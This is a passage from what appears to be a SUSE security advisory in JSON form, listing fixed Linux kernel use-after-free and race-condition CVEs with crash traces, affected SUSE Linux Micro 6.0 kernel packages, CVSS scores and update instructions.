2479.386013]I[0:launcher-loader: 1719] x14: 5d39313731203a72 x13: 00000000002f6b30 x12: 00000000002f6af8\n[ 2479.386057]I[0:launcher-loader: 1719] x11: 00000000ffffffff x10: ffffffb90aacf000 x9 : e8a74a6c16008800\n[ 2479.386101]I[0:launcher-loader: 1719] x8 : e8a74a6c16008800 x7 : 00000000002f6b30 x6 : 00000000002f6af8\n[ 2479.386145]I[0:launcher-loader: 1719] x5 : ffffffc0080070c8 x4 : ffffffd00b192380 x3 : ffffffd0092b313c\n[ 2479.386189]I[0:launcher-loader: 1719] x2 : 0000000000000001 x1 : 0000000000000004 x0 : 0000000000000022\n[ 2479.386231]I[0:launcher-loader: 1719] Call trace:\n[ 2479.386248]I[0:launcher-loader: 1719] __stack_depot_save+0x464/0x46c\n[ 2479.386273]I[0:launcher-loader: 1719] kasan_save_stack+0x58/0x70\n[ 2479.386303]I[0:launcher-loader: 1719] save_stack_info+0x34/0x138\n[ 2479.386331]I[0:launcher-loader: 1719] kasan_save_free_info+0x18/0x24\n[ 2479.386358]I[0:launcher-loader: 1719] ____kasan_slab_free+0x16c/0x170\n[ 2479.386385]I[0:launcher-loader: 1719] __kasan_slab_free+0x10/0x20\n[ 2479.386410]I[0:launcher-loader: 1719] kmem_cache_free+0x238/0x53c\n[ 2479.386435]I[0:launcher-loader: 1719] mempool_free_slab+0x1c/0x28\n[ 2479.386460]I[0:launcher-loader: 1719] mempool_free+0x7c/0x1a0\n[ 2479.386484]I[0:launcher-loader: 1719] bvec_free+0x34/0x80\n[ 2479.386514]I[0:launcher-loader: 1719] bio_free+0x60/0x98\n[ 2479.386540]I[0:launcher-loader: 1719] bio_put+0x50/0x21c\n[ 2479.386567]I[0:launcher-loader: 1719] f2fs_write_end_io+0x4ac/0x4d0\n[ 2479.386594]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300\n[ 2479.386622]I[0:launcher-loader: 1719] __dm_io_complete+0x324/0x37c\n[ 2479.386650]I[0:launcher-loader: 1719] dm_io_dec_pending+0x60/0xa4\n[ 2479.386676]I[0:launcher-loader: 1719] clone_endio+0xf8/0x2f0\n[ 2479.386700]I[0:launcher-loader: 1719] bio_endio+0x2dc/0x300\n[ 2479.386727]I[0:launcher-loader: 1719] blk_update_request+0x258/0x63c\n[ 2479.386754]I[0:launcher-loader: 1719] scsi_end_request+0x50/0x304\n[ 2479.386782]I[0:launcher-loader: 1719] scsi_io_completion+0x88/0x160\n[ 2479.386808]I[0:launcher-loader: 1719] scsi_finish_command+0x17c/0x194\n[ 2479.386833]I\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54322",
"url": "https://www.suse.com/security/cve/CVE-2023-54322"
},
{
"category": "external",
"summary": "SUSE Bug 1255763 for CVE-2023-54322",
"url": "https://bugzilla.suse.com/1255763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2023-54322"
},
{
"cve": "CVE-2023-54324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54324"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndm: fix a race condition in retrieve_deps\n\nThere\u0027s a race condition in the multipath target when retrieve_deps\nraces with multipath_message calling dm_get_device and dm_put_device.\nretrieve_deps walks the list of open devices without holding any lock\nbut multipath may add or remove devices to the list while it is\nrunning. The end result may be memory corruption or use-after-free\nmemory access.\n\nSee this description of a UAF with multipath_message():\nhttps://listman.redhat.com/archives/dm-devel/2022-October/052373.html\n\nFix this bug by introducing a new rw semaphore \"devices_lock\". We grab\ndevices_lock for read in retrieve_deps and we grab it for write in\ndm_get_device and dm_put_device.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54324",
"url": "https://www.suse.com/security/cve/CVE-2023-54324"
},
{
"category": "external",
"summary": "SUSE Bug 1255759 for CVE-2023-54324",
"url": "https://bugzilla.suse.com/1255759"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54324"
},
{
"cve": "CVE-2023-54326",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54326"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmisc: pci_endpoint_test: Free IRQs before removing the device\n\nIn pci_endpoint_test_remove(), freeing the IRQs after removing the device\ncreates a small race window for IRQs to be received with the test device\nmemory already released, causing the IRQ handler to access invalid memory,\nresulting in an oops.\n\nFree the device IRQs before removing the device to avoid this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54326",
"url": "https://www.suse.com/security/cve/CVE-2023-54326"
},
{
"category": "external",
"summary": "SUSE Bug 1255758 for CVE-2023-54326",
"url": "https://bugzilla.suse.com/1255758"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54326"
},
{
"cve": "CVE-2024-26944",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-26944"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: fix use-after-free in do_zone_finish()\n\nShinichiro reported the following use-after-free triggered by the device\nreplace operation in fstests btrfs/070.\n\n BTRFS info (device nullb1): scrub: finished on devid 1 with status: 0\n ==================================================================\n BUG: KASAN: slab-use-after-free in do_zone_finish+0x91a/0xb90 [btrfs]\n Read of size 8 at addr ffff8881543c8060 by task btrfs-cleaner/3494007\n\n CPU: 0 PID: 3494007 Comm: btrfs-cleaner Tainted: G W 6.8.0-rc5-kts #1\n Hardware name: Supermicro Super Server/X11SPi-TF, BIOS 3.3 02/21/2020\n Call Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x5b/0x90\n print_report+0xcf/0x670\n ? __virt_addr_valid+0x200/0x3e0\n kasan_report+0xd8/0x110\n ? do_zone_finish+0x91a/0xb90 [btrfs]\n ? do_zone_finish+0x91a/0xb90 [btrfs]\n do_zone_finish+0x91a/0xb90 [btrfs]\n btrfs_delete_unused_bgs+0x5e1/0x1750 [btrfs]\n ? __pfx_btrfs_delete_unused_bgs+0x10/0x10 [btrfs]\n ? btrfs_put_root+0x2d/0x220 [btrfs]\n ? btrfs_clean_one_deleted_snapshot+0x299/0x430 [btrfs]\n cleaner_kthread+0x21e/0x380 [btrfs]\n ? __pfx_cleaner_kthread+0x10/0x10 [btrfs]\n kthread+0x2e3/0x3c0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x31/0x70\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\n Allocated by task 3493983:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n __kasan_kmalloc+0xaa/0xb0\n btrfs_alloc_device+0xb3/0x4e0 [btrfs]\n device_list_add.constprop.0+0x993/0x1630 [btrfs]\n btrfs_scan_one_device+0x219/0x3d0 [btrfs]\n btrfs_control_ioctl+0x26e/0x310 [btrfs]\n __x64_sys_ioctl+0x134/0x1b0\n do_syscall_64+0x99/0x190\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\n Freed by task 3494056:\n kasan_save_stack+0x33/0x60\n kasan_save_track+0x14/0x30\n kasan_save_free_info+0x3f/0x60\n poison_slab_object+0x102/0x170\n __kasan_slab_free+0x32/0x70\n kfree+0x11b/0x320\n btrfs_rm_dev_replace_free_srcdev+0xca/0x280 [btrfs]\n btrfs_dev_replace_finishing+0xd7e/0x14f0 [btrfs]\n btrfs_dev_replace_by_ioctl+0x1286/0x25a0 [btrfs]\n btrfs_ioctl+0xb27/0x57d0 [btrfs]\n __x64_sys_ioctl+0x134/0x1b0\n do_syscall_64+0x99/0x190\n entry_SYSCALL_64_after_hwframe+0x6e/0x76\n\n The buggy address belongs to the object at ffff8881543c8000\n which belongs to the cache kmalloc-1k of size 1024\n The buggy address is located 96 bytes inside of\n freed 1024-byte region [ffff8881543c8000, ffff8881543c8400)\n\n The buggy address belongs to the physical page:\n page:00000000fe2c1285 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x1543c8\n head:00000000fe2c1285 order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0\n flags: 0x17ffffc0000840(slab|head|node=0|zone=2|lastcpupid=0x1fffff)\n page_type: 0xffffffff()\n raw: 0017ffffc0000840 ffff888100042dc0 ffffea0019e8f200 dead000000000002\n raw: 0000000000000000 0000000000100010 00000001ffffffff 0000000000000000\n page dumped because: kasan: bad access detected\n\n Memory state around the buggy address:\n ffff8881543c7f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n ffff8881543c7f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\n \u003effff8881543c8000: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ^\n ffff8881543c8080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n ffff8881543c8100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb\n\nThis UAF happens because we\u0027re accessing stale zone information of a\nalready removed btrfs_device in do_zone_finish().\n\nThe sequence of events is as follows:\n\nbtrfs_dev_replace_start\n btrfs_scrub_dev\n btrfs_dev_replace_finishing\n btrfs_dev_replace_update_device_in_mapping_tree \u003c-- devices replaced\n btrfs_rm_dev_replace_free_srcdev\n btrfs_free_device \u003c-- device freed\n\ncleaner_kthread\n btrfs_delete_unused_bgs\n btrfs_zone_finish\n do_zone_finish \u003c-- refers the freed device\n\nThe reason for this is that we\u0027re using a\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-26944",
"url": "https://www.suse.com/security/cve/CVE-2024-26944"
},
{
"category": "external",
"summary": "SUSE Bug 1223731 for CVE-2024-26944",
"url": "https://bugzilla.suse.com/1223731"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2024-26944"
},
{
"cve": "CVE-2024-27005",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-27005"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Don\u0027t access req_list while it\u0027s being manipulated\n\nThe icc_lock mutex was split into separate icc_lock and icc_bw_lock\nmutexes in [1] to avoid lockdep splats. However, this didn\u0027t adequately\nprotect access to icc_node::req_list.\n\nThe icc_set_bw() function will eventually iterate over req_list while\nonly holding icc_bw_lock, but req_list can be modified while only\nholding icc_lock. This causes races between icc_set_bw(), of_icc_get(),\nand icc_put().\n\nExample A:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n icc_put(path_b)\n mutex_lock(\u0026icc_lock);\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_del(...\n \u003cr = invalid pointer\u003e\n\nExample B:\n\n CPU0 CPU1\n ---- ----\n icc_set_bw(path_a)\n mutex_lock(\u0026icc_bw_lock);\n path_b = of_icc_get()\n of_icc_get_by_index()\n mutex_lock(\u0026icc_lock);\n path_find()\n path_init()\n aggregate_requests()\n hlist_for_each_entry(r, ...\n hlist_add_head(...\n \u003cr = invalid pointer\u003e\n\nFix this by ensuring icc_bw_lock is always held before manipulating\nicc_node::req_list. The additional places icc_bw_lock is held don\u0027t\nperform any memory allocations, so we should still be safe from the\noriginal lockdep splats that motivated the separate locks.\n\n[1] commit af42269c3523 (\"interconnect: Fix locking for runpm vs reclaim\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-27005",
"url": "https://www.suse.com/security/cve/CVE-2024-27005"
},
{
"category": "external",
"summary": "SUSE Bug 1223800 for CVE-2024-27005",
"url": "https://bugzilla.suse.com/1223800"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2024-27005"
},
{
"cve": "CVE-2024-42103",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-42103"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix adding block group to a reclaim list and the unused list during reclaim\n\nThere is a potential parallel list adding for retrying in\nbtrfs_reclaim_bgs_work and adding to the unused list. Since the block\ngroup is removed from the reclaim list and it is on a relocation work,\nit can be added into the unused list in parallel. When that happens,\nadding it to the reclaim list will corrupt the list head and trigger\nlist corruption like below.\n\nFix it by taking fs_info-\u003eunused_bgs_lock.\n\n [177.504][T2585409] BTRFS error (device nullb1): error relocating ch= unk 2415919104\n [177.514][T2585409] list_del corruption. next-\u003eprev should be ff1100= 0344b119c0, but was ff11000377e87c70. (next=3Dff110002390cd9c0)\n [177.529][T2585409] ------------[ cut here ]------------\n [177.537][T2585409] kernel BUG at lib/list_debug.c:65!\n [177.545][T2585409] Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN NOPTI\n [177.555][T2585409] CPU: 9 PID: 2585409 Comm: kworker/u128:2 Tainted: G W 6.10.0-rc5-kts #1\n [177.568][T2585409] Hardware name: Supermicro SYS-520P-WTR/X12SPW-TF, BIOS 1.2 02/14/2022\n [177.579][T2585409] Workqueue: events_unbound btrfs_reclaim_bgs_work[btrfs]\n [177.589][T2585409] RIP: 0010:__list_del_entry_valid_or_report.cold+0x70/0x72\n [177.624][T2585409] RSP: 0018:ff11000377e87a70 EFLAGS: 00010286\n [177.633][T2585409] RAX: 000000000000006d RBX: ff11000344b119c0 RCX:0000000000000000\n [177.644][T2585409] RDX: 000000000000006d RSI: 0000000000000008 RDI:ffe21c006efd0f40\n [177.655][T2585409] RBP: ff110002e0509f78 R08: 0000000000000001 R09:ffe21c006efd0f08\n [177.665][T2585409] R10: ff11000377e87847 R11: 0000000000000000 R12:ff110002390cd9c0\n [177.676][T2585409] R13: ff11000344b119c0 R14: ff110002e0508000 R15:dffffc0000000000\n [177.687][T2585409] FS: 0000000000000000(0000) GS:ff11000fec880000(0000) knlGS:0000000000000000\n [177.700][T2585409] CS: 0010 DS: 0000 ES: 0000 CR0: 